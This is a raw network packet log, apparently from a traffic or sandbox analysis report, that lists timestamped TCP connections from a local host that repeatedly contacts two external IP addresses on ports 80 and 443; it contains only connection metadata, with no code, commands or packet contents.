Jan 11, 2025 07:24:22.652848959 CET	49917	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:22.652885914 CET	443	49917	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:22.652956963 CET	49917	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:22.652970076 CET	443	49917	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:22.943979025 CET	443	49917	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:22.944168091 CET	443	49917	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:22.944358110 CET	49917	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:22.944525003 CET	49917	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:22.947683096 CET	49915	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:22.948834896 CET	49927	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:22.952708006 CET	80	49915	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:22.952792883 CET	49915	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:22.953737974 CET	80	49927	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:22.953808069 CET	49927	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:22.953865051 CET	49927	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:22.958703041 CET	80	49927	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:23.591645956 CET	80	49927	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:23.592912912 CET	49933	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:23.592951059 CET	443	49933	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:23.593024015 CET	49933	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:23.593277931 CET	49933	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:23.593293905 CET	443	49933	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:23.638397932 CET	49927	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:24.218777895 CET	443	49933	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:24.220329046 CET	49933	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:24.220357895 CET	443	49933	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:24.220468044 CET	49933	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:24.220474005 CET	443	49933	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:24.576914072 CET	443	49933	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:24.577017069 CET	443	49933	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:24.577066898 CET	49933	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:24.577421904 CET	49933	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:24.582070112 CET	49927	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:24.583384037 CET	49939	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:24.587097883 CET	80	49927	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:24.587161064 CET	49927	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:24.588290930 CET	80	49939	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:24.588371038 CET	49939	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:24.588469982 CET	49939	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:24.593327045 CET	80	49939	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:25.233091116 CET	80	49939	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:25.234394073 CET	49945	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:25.234428883 CET	443	49945	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:25.234497070 CET	49945	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:25.234792948 CET	49945	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:25.234807968 CET	443	49945	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:25.279026031 CET	49939	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:25.861372948 CET	443	49945	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:25.862993956 CET	49945	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:25.863003016 CET	443	49945	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:25.863131046 CET	49945	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:25.863135099 CET	443	49945	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:26.128137112 CET	443	49945	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:26.128247976 CET	443	49945	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:26.128602028 CET	49945	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:26.128911018 CET	49945	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:26.132270098 CET	49939	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:26.133555889 CET	49951	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:26.137311935 CET	80	49939	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:26.137670040 CET	49939	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:26.138379097 CET	80	49951	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:26.138590097 CET	49951	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:26.138719082 CET	49951	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:26.143611908 CET	80	49951	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:26.784008026 CET	80	49951	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:26.785628080 CET	49957	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:26.785717010 CET	443	49957	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:26.785847902 CET	49957	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:26.786130905 CET	49957	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:26.786158085 CET	443	49957	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:26.825968981 CET	49951	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:27.390870094 CET	443	49957	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:27.392584085 CET	49957	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:27.392662048 CET	443	49957	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:27.392735958 CET	49957	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:27.392752886 CET	443	49957	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:27.614841938 CET	443	49957	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:27.614933014 CET	443	49957	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:27.615047932 CET	49957	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:27.615602970 CET	49957	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:27.618994951 CET	49951	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:27.620116949 CET	49963	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:27.624021053 CET	80	49951	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:27.624094009 CET	49951	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:27.624974966 CET	80	49963	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:27.625068903 CET	49963	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:27.625197887 CET	49963	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:27.630004883 CET	80	49963	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:28.274966002 CET	80	49963	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:28.284172058 CET	49969	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:28.284240961 CET	443	49969	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:28.284324884 CET	49969	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:28.284738064 CET	49969	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:28.284753084 CET	443	49969	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:28.326016903 CET	49963	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:28.886639118 CET	443	49969	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:28.888350010 CET	49969	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:28.888359070 CET	443	49969	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:28.888449907 CET	49969	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:28.888454914 CET	443	49969	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:29.303378105 CET	443	49969	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:29.303482056 CET	443	49969	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:29.303577900 CET	49969	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:29.304038048 CET	49969	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:29.307292938 CET	49963	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:29.308548927 CET	49975	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:29.313268900 CET	80	49963	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:29.314173937 CET	80	49975	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:29.314243078 CET	49963	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:29.314290047 CET	49975	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:29.314448118 CET	49975	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:29.319979906 CET	80	49975	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:29.942653894 CET	80	49975	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:29.944663048 CET	49981	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:29.944709063 CET	443	49981	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:29.944787979 CET	49981	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:29.945216894 CET	49981	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:29.945233107 CET	443	49981	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:29.997842073 CET	49975	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:30.569681883 CET	443	49981	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:30.572125912 CET	49981	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:30.572155952 CET	443	49981	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:30.572215080 CET	49981	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:30.572225094 CET	443	49981	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:30.788830996 CET	443	49981	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:30.788919926 CET	443	49981	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:30.788990974 CET	49981	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:30.789433956 CET	49981	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:30.792265892 CET	49975	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:30.793301105 CET	49987	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:30.797571898 CET	80	49975	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:30.797669888 CET	49975	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:30.798919916 CET	80	49987	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:30.798998117 CET	49987	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:30.799271107 CET	49987	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:30.804332972 CET	80	49987	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:31.444658995 CET	80	49987	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:31.446036100 CET	49993	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:31.446099043 CET	443	49993	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:31.446192026 CET	49993	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:31.446455956 CET	49993	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:31.446468115 CET	443	49993	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:31.497848988 CET	49987	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:32.061026096 CET	443	49993	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:32.062984943 CET	49993	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:32.063007116 CET	443	49993	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:32.063082933 CET	49993	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:32.063088894 CET	443	49993	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:32.449641943 CET	443	49993	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:32.449736118 CET	443	49993	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:32.449898958 CET	49993	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:32.450371981 CET	49993	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:32.453187943 CET	49987	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:32.454169989 CET	49999	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:32.458215952 CET	80	49987	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:32.459067106 CET	80	49999	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:32.459136009 CET	49987	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:32.459171057 CET	49999	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:32.459240913 CET	49999	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:32.464013100 CET	80	49999	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:33.106791973 CET	80	49999	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:33.108386040 CET	50005	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:33.108419895 CET	443	50005	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:33.108638048 CET	50005	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:33.108833075 CET	50005	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:33.108851910 CET	443	50005	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:33.154155970 CET	49999	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:33.722306013 CET	443	50005	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:33.723886967 CET	50005	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:33.723921061 CET	443	50005	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:33.723999977 CET	50005	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:33.724009037 CET	443	50005	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:34.070914984 CET	443	50005	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:34.070995092 CET	443	50005	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:34.071115971 CET	50005	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:34.071450949 CET	50005	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:34.074042082 CET	49999	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:34.075376034 CET	50011	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:34.079121113 CET	80	49999	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:34.079216003 CET	49999	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:34.080256939 CET	80	50011	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:34.080346107 CET	50011	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:34.080444098 CET	50011	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:34.085144043 CET	80	50011	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:34.716219902 CET	80	50011	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:34.721338034 CET	50017	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:34.721374989 CET	443	50017	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:34.725054979 CET	50017	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:34.733093023 CET	50017	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:34.733136892 CET	443	50017	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:34.763511896 CET	50011	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:35.367162943 CET	443	50017	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:35.369218111 CET	50017	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:35.369244099 CET	443	50017	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:35.369379044 CET	50017	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:35.369385004 CET	443	50017	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:35.664464951 CET	443	50017	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:35.664544106 CET	443	50017	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:35.664604902 CET	50017	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:35.665118933 CET	50017	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:35.668809891 CET	50011	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:35.669981003 CET	50024	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:35.673758030 CET	80	50011	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:35.673832893 CET	50011	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:35.674796104 CET	80	50024	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:35.674863100 CET	50024	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:35.674964905 CET	50024	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:35.679776907 CET	80	50024	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:36.315814018 CET	80	50024	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:36.320899963 CET	50029	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:36.320955992 CET	443	50029	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:36.321079016 CET	50029	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:36.321419001 CET	50029	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:36.321433067 CET	443	50029	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:36.372914076 CET	50024	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:36.925746918 CET	443	50029	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:36.929511070 CET	50029	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:36.929543972 CET	443	50029	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:36.929640055 CET	50029	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:36.929646969 CET	443	50029	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:37.245930910 CET	443	50029	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:37.246012926 CET	443	50029	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:37.246171951 CET	50029	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:37.251751900 CET	50029	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:37.265314102 CET	50024	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:37.266308069 CET	50038	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:37.270243883 CET	80	50024	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:37.271188974 CET	80	50038	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:37.271256924 CET	50024	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:37.271317959 CET	50038	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:37.271446943 CET	50038	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:37.276328087 CET	80	50038	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:37.912435055 CET	80	50038	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:37.914051056 CET	50041	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:37.914113045 CET	443	50041	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:37.914206982 CET	50041	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:37.914534092 CET	50041	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:37.914561033 CET	443	50041	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:37.966677904 CET	50038	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:38.522454023 CET	443	50041	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:38.524671078 CET	50041	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:38.524696112 CET	443	50041	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:38.524808884 CET	50041	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:38.524813890 CET	443	50041	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:38.795646906 CET	443	50041	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:38.795734882 CET	443	50041	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:38.795826912 CET	50041	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:38.796344042 CET	50041	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:38.808082104 CET	50038	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:38.809407949 CET	50045	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:38.813096046 CET	80	50038	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:38.813968897 CET	50038	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:38.814194918 CET	80	50045	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:38.814266920 CET	50045	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:38.814771891 CET	50045	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:38.819617033 CET	80	50045	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:39.440491915 CET	80	50045	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:39.441751957 CET	50046	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:39.441793919 CET	443	50046	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:39.441904068 CET	50046	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:39.442177057 CET	50046	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:39.442188978 CET	443	50046	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:39.482323885 CET	50045	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:40.072491884 CET	443	50046	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:40.082547903 CET	50046	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:40.082576990 CET	443	50046	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:40.082669020 CET	50046	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:40.082679033 CET	443	50046	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:40.334328890 CET	443	50046	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:40.334414005 CET	443	50046	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:40.334582090 CET	50046	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:40.335331917 CET	50046	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:40.337996006 CET	50045	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:40.338675022 CET	50047	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:40.343143940 CET	80	50045	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:40.343213081 CET	50045	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:40.343640089 CET	80	50047	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:40.343722105 CET	50047	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:40.343822002 CET	50047	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:40.348969936 CET	80	50047	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:40.979767084 CET	80	50047	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:40.981164932 CET	50048	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:40.981226921 CET	443	50048	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:40.981344938 CET	50048	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:40.981677055 CET	50048	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:40.981697083 CET	443	50048	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:41.029203892 CET	50047	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:41.599189997 CET	443	50048	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:41.600991011 CET	50048	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:41.601027966 CET	443	50048	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:41.601113081 CET	50048	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:41.601123095 CET	443	50048	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:41.908880949 CET	443	50048	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:41.908961058 CET	443	50048	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:41.909077883 CET	50048	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:41.909645081 CET	50048	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:41.913033009 CET	50047	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:41.914238930 CET	50049	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:41.917957067 CET	80	50047	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:41.919104099 CET	80	50049	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:41.919178009 CET	50047	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:41.919225931 CET	50049	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:41.919287920 CET	50049	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:41.924067974 CET	80	50049	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:42.564404011 CET	80	50049	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:42.567125082 CET	50050	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:42.567179918 CET	443	50050	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:42.567253113 CET	50050	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:42.567929029 CET	50050	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:42.567949057 CET	443	50050	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:42.607357025 CET	50049	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:43.183028936 CET	443	50050	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:43.185209990 CET	50050	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:43.185234070 CET	443	50050	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:43.185290098 CET	50050	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:43.185301065 CET	443	50050	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:43.473615885 CET	443	50050	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:43.473794937 CET	443	50050	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:43.473875999 CET	50050	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:43.474374056 CET	50050	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:43.478061914 CET	50049	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:43.479470968 CET	50051	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:43.483139038 CET	80	50049	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:43.483227968 CET	50049	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:43.484276056 CET	80	50051	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:43.484350920 CET	50051	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:43.484508038 CET	50051	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:43.489326954 CET	80	50051	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:44.159471035 CET	80	50051	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:44.160931110 CET	50052	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:44.160973072 CET	443	50052	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:44.161113024 CET	50052	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:44.161370993 CET	50052	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:44.161392927 CET	443	50052	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:44.201276064 CET	50051	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:44.778974056 CET	443	50052	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:44.788278103 CET	50052	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:44.788299084 CET	443	50052	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:44.788542032 CET	50052	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:44.788547039 CET	443	50052	149.154.167.220	192.168.2.4
